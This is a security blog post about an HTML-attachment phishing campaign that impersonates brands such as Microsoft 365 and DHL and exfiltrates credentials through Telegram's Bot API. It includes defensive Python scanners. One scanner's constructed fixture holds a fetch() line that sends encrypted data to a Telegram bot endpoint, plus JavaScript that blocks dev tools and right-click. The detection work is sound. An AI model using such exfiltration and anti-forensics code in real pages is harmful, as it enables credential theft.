Phishing has evolved, and attackers no longer rely on suspicious links or poorly designed fake websites. Today, a new campaign is using HTML file attachments in emails to impersonate well-known brands like Microsoft 365, Adobe, WeTransfer, FedEx, and DHL. Their goal? To trick you into revealing your corporate or personal credentials.
This new wave of attacks, targeting organizations in Central and Eastern Europe, is highly sophisticated. According to an analysis by cybersecurity firm Cyble, the attackers understand business processes well and use advanced social engineering tactics to infiltrate sectors like agriculture, automotive, construction, and education.
The Trick: Legit-Looking HTML Attachments
Instead of redirecting users to fraudulent websites, attackers include a malicious HTML file directly within the email. When opened, the file presents a login page that mimics the real branding — logos, colors, layout — of the spoofed company.
This technique gives cybercriminals a key advantage: they don’t need suspicious URLs or external servers that might be flagged by email security filters. All malicious content is embedded within the file itself.
The emails usually have believable subject lines and filenames, such as RFQ_4460-INQUIRY.HTML (RFQ stands for Request for Quotation), which adds legitimacy. For companies that regularly deal with quotes or procurement workflows, these messages appear entirely authentic.
How the Attack Works, Step by Step
- The email arrives with an HTML file attached. The sender pretends to be a client or business partner.
- The user opens the file. A fake login page appears — Microsoft, Adobe, etc.
- The victim enters their credentials.
- The embedded JavaScript code captures the data and instantly sends it to a Telegram bot controlled by the attackers.
Unlike traditional phishing, this technique avoids a centralized collection server. The stolen data is sent straight to Telegram, which makes the attack harder for security teams to trace.
Campaign Overview (Source: Cyble)
Technical Details: Designed to Evade Detection
Cyble’s analysis revealed that the attackers use embedded JavaScript within the HTML file to collect usernames, passwords, IP addresses, and browser details.
- In some variants, the code uses AES encryption with CryptoJS to hide the data before transmission.
- Others include anti-forensics measures that block the F12 key (developer tools), Ctrl+U (view source), and right-click.
- The stolen data is sent via HTTPS requests to Telegram's Bot API, using hardcoded tokens and chat IDs within the file.
This level of sophistication shows how criminals now use refined methods to blend into normal network traffic, avoiding alerts from tools like EDR (Endpoint Detection & Response) or DLP (Data Loss Prevention).
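The indicators listed above (a hardcoded Telegram Bot API endpoint and token, CryptoJS AES, and JavaScript that suppresses F12, Ctrl+U and right-click) are all visible in the attachment's source, so a mail gateway or analyst can triage an HTML attachment statically before anyone opens it. The following scanner is an added example written for this article; it is not Cyble's or TecnetOne's tooling. The regexes, weights and threshold are this example's own assumptions rather than published signatures, and both fixtures are constructed (the token is a placeholder and the "malicious" fixture has no working form handling).

```python
"""Static triage of an HTML e-mail attachment for the indicators described
above: JavaScript posting to Telegram's Bot API, a hard-coded bot token and
chat id, CryptoJS AES, and dev-tools / right-click blocking.

Added example for this article, not Cyble's or TecnetOne's tooling. The
regexes, weights and threshold are this example's own assumptions, not
published signatures."""
import re
from dataclasses import dataclass, field

# (indicator name, pattern, weight). Weights are assumptions for this example.
INDICATORS = [
    ("telegram_bot_api", re.compile(r"api\.telegram\.org/bot", re.I), 5),
    # Shape of a bot token: "<numeric bot id>:<long secret>". Matches the shape only.
    ("hardcoded_bot_token", re.compile(r"\bbot\d{6,12}:[A-Za-z0-9_-]{30,}"), 4),
    ("chat_id_param", re.compile(r"chat_id", re.I), 2),
    ("cryptojs_aes", re.compile(r"CryptoJS\.AES\.(encrypt|decrypt)", re.I), 2),
    ("blocks_contextmenu", re.compile(r"contextmenu", re.I), 2),
    ("blocks_devtools_keys",
     re.compile(r"F12|keyCode\s*===?\s*123|ctrlKey[^;]{0,60}[\"'][uU][\"']"), 2),
    ("password_field", re.compile(r"type\s*=\s*[\"']password[\"']", re.I), 1),
    ("fetch_or_xhr", re.compile(r"\bfetch\s*\(|XMLHttpRequest"), 1),
]

# Captures the bot id and the secret part of a Bot API URL found in the file.
TOKEN_RE = re.compile(r"api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]+)", re.I)


@dataclass
class Verdict:
    score: int = 0
    hits: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= 6  # threshold is an assumption for this example


def scan_html_attachment(html: str) -> Verdict:
    """Score an attachment body; each matching indicator adds its weight."""
    verdict = Verdict()
    for name, pattern, weight in INDICATORS:
        if pattern.search(html):
            verdict.hits.append(name)
            verdict.score += weight
    return verdict


def extract_telegram_endpoints(html: str) -> list:
    """Return the bot ids used for exfiltration with the secret redacted, so
    the value can go into a ticket or blocklist without copying the token."""
    return [f"bot{bot_id}:<redacted>" for bot_id, _secret in TOKEN_RE.findall(html)]


# Constructed fixture modelled on the indicators in the article. It is not a
# working phishing page (no form handling) and the token is a placeholder.
SAMPLE_MALICIOUS = """
<html><body>
<div class="brand">Sign in to continue</div>
<input type="password" name="passwd">
<script src="crypto-js.min.js"></script>
<script>
document.addEventListener('contextmenu', e => e.preventDefault());
document.onkeydown = function (e) {
  if (e.keyCode == 123 || (e.ctrlKey && e.key == 'u')) return false;
};
var enc = CryptoJS.AES.encrypt(payload, 'k').toString();
fetch('https://api.telegram.org/bot123456789:PLACEHOLDER_TOKEN_XXXXXXXXXXXXXXXXXXXX/sendMessage?chat_id=-100111&text=' + enc);
</script></body></html>
"""

# Constructed benign quotation attachment: branding and a link, no script.
SAMPLE_BENIGN = """
<html><body><p>Please find our quotation for inquiry 4460 below.</p>
<a href="https://example.com/quotes/4460">Open quotation</a></body></html>
"""

if __name__ == "__main__":
    for label, body in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        v = scan_html_attachment(body)
        print(f"{label}: score={v.score} suspicious={v.suspicious} hits={v.hits}")
    print("endpoints:", extract_telegram_endpoints(SAMPLE_MALICIOUS))
```

The scoring is additive on purpose: a password field or a `fetch()` call alone is normal in legitimate HTML, but a password field next to a Bot API URL and keyboard-shortcut suppression has no business use, so only the combination crosses the threshold. The benign quotation scores zero.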
Why This Campaign Works So Well
Its success lies in how well attackers understand business environments. These aren’t generic phishing attempts — they are tailored to industries where RFQs, invoices, or pricing requests are common.
Messages use the right tone, impersonate real vendors or partners, and catch employees off guard. Because attackers use HTML attachments instead of links, they bypass standard email security tools. Most filters still don’t analyze these files in depth, leaving a blind spot in enterprise defenses.
Telegram: The New Cybercrime Ally
Traditionally, stolen credentials were sent to a remote server or stored in hidden repositories. But this campaign reveals a growing trend: using legitimate messaging platforms like Telegram for data exfiltration.
Telegram offers anonymity, encryption, and a decentralized structure ideal for cybercriminal coordination. By using its Bot API, attackers:
- Avoid detection by corporate firewalls
- Eliminate the need for traceable domains
- Accelerate credential theft and evidence destruction
What Companies Can Do to Protect Themselves
At TecnetOne, we recommend a layered strategy that combines education, technology, and real-time monitoring:
- Block HTML Attachments
Set email policies to block or analyze .html and .htm attachments, especially from unknown senders.
- Deploy Content Analysis Tools
Use sandboxing systems to open and inspect email attachments in isolated environments.
- Monitor Traffic to Telegram
Security teams should flag any abnormal traffic to api.telegram.org, as it may signal bot activity.
- Enable Multi-Factor Authentication (MFA)
MFA adds a second layer of protection. Even if credentials are stolen, they won’t be enough.
- Train Your Employees
Human error remains the weakest link. Run phishing simulations and train staff to recognize suspicious attachments.
- Conduct Regular Audits
Check access logs and perform retrospective queries to find compromised credentials.
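The "Monitor Traffic to Telegram" item above, and the Bot API exfiltration described in the previous section, can be turned into a concrete detection on proxy or egress logs: any request to api.telegram.org is worth an alert, and one whose path has the Bot API shape (`/bot<id>:<token>/sendMessage`, `/sendDocument`, and so on) is the exfiltration channel itself. The script below is an added example written for this article, not TecnetOne's or Cyble's tooling. The log format it parses is a constructed, simplified one (timestamp, source IP, method, host, path, status), the sample lines are constructed and the token in them is a placeholder; adapt `parse_line` to your proxy's real format.

```python
"""Flag proxy-log requests to api.telegram.org, rating Bot API calls
(/bot<id>:<token>/sendMessage, /sendDocument, ...) highest, since that is
the path the article says stolen credentials travel.

Added example for this article, not TecnetOne's or Cyble's tooling. The
log format is a constructed, simplified one:
    timestamp src_ip method host path status
Adapt parse_line() to your proxy's actual format."""
import re
from collections import Counter

TELEGRAM_API_HOST = "api.telegram.org"
# Bot API path shape; the bot id is kept, the secret part is never stored.
BOT_PATH_RE = re.compile(r"^/bot(\d+):[A-Za-z0-9_-]+/(\w+)")

# Constructed sample log lines (not real traffic). The token is a placeholder.
LOG_LINES = [
    "2024-05-06T09:12:01Z 10.0.4.21 GET login.microsoftonline.com /common/oauth2/v2.0/authorize 200",
    "2024-05-06T09:12:44Z 10.0.4.21 POST api.telegram.org /bot123456789:PLACEHOLDER_TOKEN/sendMessage 200",
    "2024-05-06T09:13:02Z 10.0.7.9 GET web.telegram.org /k/ 200",
    "2024-05-06T09:14:10Z 10.0.4.21 GET api.telegram.org /bot123456789:PLACEHOLDER_TOKEN/sendDocument 200",
    "2024-05-06T09:14:55Z 10.0.9.14 GET api.telegram.org /favicon.ico 404",
    "2024-05-06T09:15:30Z 10.0.2.3 GET cdn.example.com /assets/app.js 304",
    "malformed log entry",
]


def parse_line(line: str):
    """Split one constructed log line into its fields; None if malformed."""
    parts = line.split()
    if len(parts) != 6:
        return None
    ts, src, method, host, path, status = parts
    return {"ts": ts, "src": src, "method": method, "host": host,
            "path": path, "status": status}


def find_telegram_exfil(lines) -> list:
    """Return one alert per request to api.telegram.org.

    severity "high":   Bot API call (the exfiltration channel described above)
    severity "medium": any other request to the API host, worth a look but
                       not by itself evidence of a phishing kit
    """
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["host"].lower() != TELEGRAM_API_HOST:
            continue
        m = BOT_PATH_RE.match(rec["path"])
        alerts.append({
            "ts": rec["ts"],
            "src": rec["src"],
            "severity": "high" if m else "medium",
            "bot_id": m.group(1) if m else None,      # safe to share in a ticket
            "api_method": m.group(2) if m else None,  # e.g. sendMessage
        })
    return alerts


def summarize_by_source(alerts) -> dict:
    """Count high-severity alerts per internal source: the hosts to isolate
    and the users whose credentials to reset first."""
    return dict(Counter(a["src"] for a in alerts if a["severity"] == "high"))


if __name__ == "__main__":
    found = find_telegram_exfil(LOG_LINES)
    for a in found:
        print(a)
    print("hosts with Bot API calls:", summarize_by_source(found))
```

Two design points: the match is on the exact host api.telegram.org, so ordinary use of the web client at web.telegram.org is not flagged (whether to allow that at all is a policy decision), and the bot token that appears in the path is deliberately dropped from the alert, so the detection output can be shared and stored without carrying the attacker's credential around.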
What This Means for Corporate Cybersecurity
These campaigns show that traditional security models are no longer enough. Organizations need end-to-end visibility — from web traffic and emails to file attachments and in-browser activity.
The use of HTML files as attack vectors marks a shift in strategy. Rather than hacking systems, attackers exploit trust and routine workflows.
At TecnetOne, we emphasize proactive digital education and strong policies to block these threats before they start. Preventing a single wrong click can be the difference between a secure operation and a massive data breach.
Conclusion
Phishing is no longer limited to badly written emails or shady links. Attackers now impersonate major brands, use advanced tech, and exploit user inattention.
Next time you receive an unexpected attachment, remember: social engineering is cybercrime’s most effective tool. Don’t open what you weren’t expecting. Always verify the source, and most importantly — keep your defenses updated.
